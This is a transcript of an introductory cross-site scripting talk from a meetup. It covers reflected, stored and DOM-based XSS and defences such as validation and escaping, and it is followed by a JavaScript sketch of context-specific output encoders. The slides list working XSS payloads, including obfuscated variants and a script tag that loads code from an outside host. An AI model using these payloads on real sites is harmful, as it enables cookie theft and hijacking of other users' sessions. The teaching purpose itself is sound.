Xss 101

null Hyderabad Chapter - May 2014 Meet

    Xss 101 Presentation Transcript

    • Cross Site Scripting (XSS)
    • What is XSS?
        • Cross Site Scripting (XSS) is a vulnerability which, when present in websites or web applications, allows malicious users (hackers) to insert their own client-side code (normally JavaScript) into those web pages.
        • When this malicious code is displayed in the web client (browsers like IE, Mozilla etc.) along with the original web page, it allows hackers to gain greater access to that page.
    • XSS (-ve) effects
        • Stealing other users' cookies
        • Stealing their private information
        • Performing actions on behalf of other users
        • Redirecting to other websites
        • Showing ads in hidden IFRAMEs and pop-ups
    • Types of XSS attacks
        • Non-persistent (Reflected)
        • Persistent (Stored)
        • DOM Based
    • Non-persistent
        • The XSS code is only displayed in the next page to the same user and is not saved into persistent storage like a database.
        • This type of attack is less harmful, because the hacker can see only their own cookies and can make modifications only in their own currently open pages.
    • Vector : %u3008script%u3009alert(document.domain);%u3008/script%u3009
    • Persistent XSS
        • In the persistent type of XSS attack, the XSS code gets saved into persistent storage like a database along with other data, and is then visible to other users as well.
        • This type of attack is more harmful, because the hacker can steal cookies and can make modifications in the page.
    • Vector: <b onmouseover=alert(/000/);>Click me!</b>
    • DOM based attack
        • DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim's browser used by the original client-side script, so that the client-side code runs in an unexpected manner.
        • That is, the page itself (the HTTP response) does not change, but the client-side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.
    • Vector: #”><img src=x onerror=prompt(1);>
    • Prevention
        • Never trust user input data, no matter where it's coming from (GET, POST, COOKIE etc.).
    • Validation at server
        • By sanitizing the input data, we can prevent malicious code from entering the system.
        • Checking for the proper data types helps in cleaning the data. First of all, we should allow only numeric data in numeric fields and only alphanumeric characters in text fields.
        • Whitelists – Allow <strong>, <em> and <br> only – Does help, but not 100%
        • Blacklists – Block <script> and other attributes such as onload, onclick, onmouseover etc.
    • Demo: Bypassing Blacklist WAF
    • Validation at client side
        • Performing client-side (JavaScript) validation before submitting the data to the server helps only with the usability aspect of the website.
        • It can't provide any actual security, because the user can disable JavaScript. Many JavaScript libraries and frameworks are available for this.
    • Escaping output at server
        • Problem characters can include < > " &. These characters can be replaced with HTML character entities. For example, < can be replaced with &lt;.
        • 5 rules for escaping output:
            • #1 - HTML Escape before inserting into element content
            • #2 - Attribute Escape before inserting into attributes
            • #3 - JavaScript Escape before inserting into JavaScript data values
            • #4 - CSS Escape before inserting into style property values
            • #5 - URL Escape before inserting into URL attributes
    • XSS vectors
        • <IMG SRC=javascript:alert('XSS')>
        • <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
        • <IMG SRC=javascript:alert(&quot;XSS&quot;)>
        • <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
        • <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
        • <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
        • <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    • Thank you
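
The "5 rules for escaping output" from the "Escaping output at server" slide, sketched as server-side JavaScript encoders for rules #1, #2, #3 and #5 (rule #4, CSS, is left out). This is an added example, not code from the presentation; all function names are hypothetical, and the scheme allow-list in `safeUrl` is an assumption that goes beyond what the slide states.

```javascript
// Added example (not from the slides). Function names are hypothetical.
// Production code should prefer a maintained encoding library.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Rule #1: HTML-escape before inserting into element content.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Rule #2: attribute-escape. Every non-alphanumeric character becomes &#xHH;
// so the value cannot close the quote or start a new attribute.
function escapeAttr(value) {
  return Array.from(String(value), (ch) =>
    /^[A-Za-z0-9]$/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`
  ).join('');
}

// Rule #3: JavaScript-escape a value placed inside a quoted JS string.
// Escaping per UTF-16 code unit also neutralises </script> and quotes.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Rule #5: URL-escape a value used as a query parameter.
function escapeUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Assumption beyond the slides: a whole URL placed in href/src is also
// checked against a scheme allow-list, because escaping alone does not
// stop javascript: URLs. Only absolute http(s) URLs are accepted.
function safeUrl(value) {
  try {
    const url = new URL(String(value));
    return ['http:', 'https:'].includes(url.protocol) ? url.href : '#';
  } catch (err) {
    return '#'; // unparsable or relative input
  }
}

// Each untrusted value goes through the encoder for the context it lands in.
function renderProfile(name, site, query) {
  return `<p title="${escapeAttr(name)}">${escapeHtml(name)}</p>` +
    `<a href="${escapeAttr(safeUrl(site))}">site</a>` +
    `<a href="/search?q=${escapeUrlParam(query)}">search</a>` +
    `<script>var n = "${escapeJsString(name)}";</script>`;
}
```

The same input is encoded differently in each of the four places it appears, which is why a single blacklist or a single escape function applied at input time cannot replace encoding at the point of output.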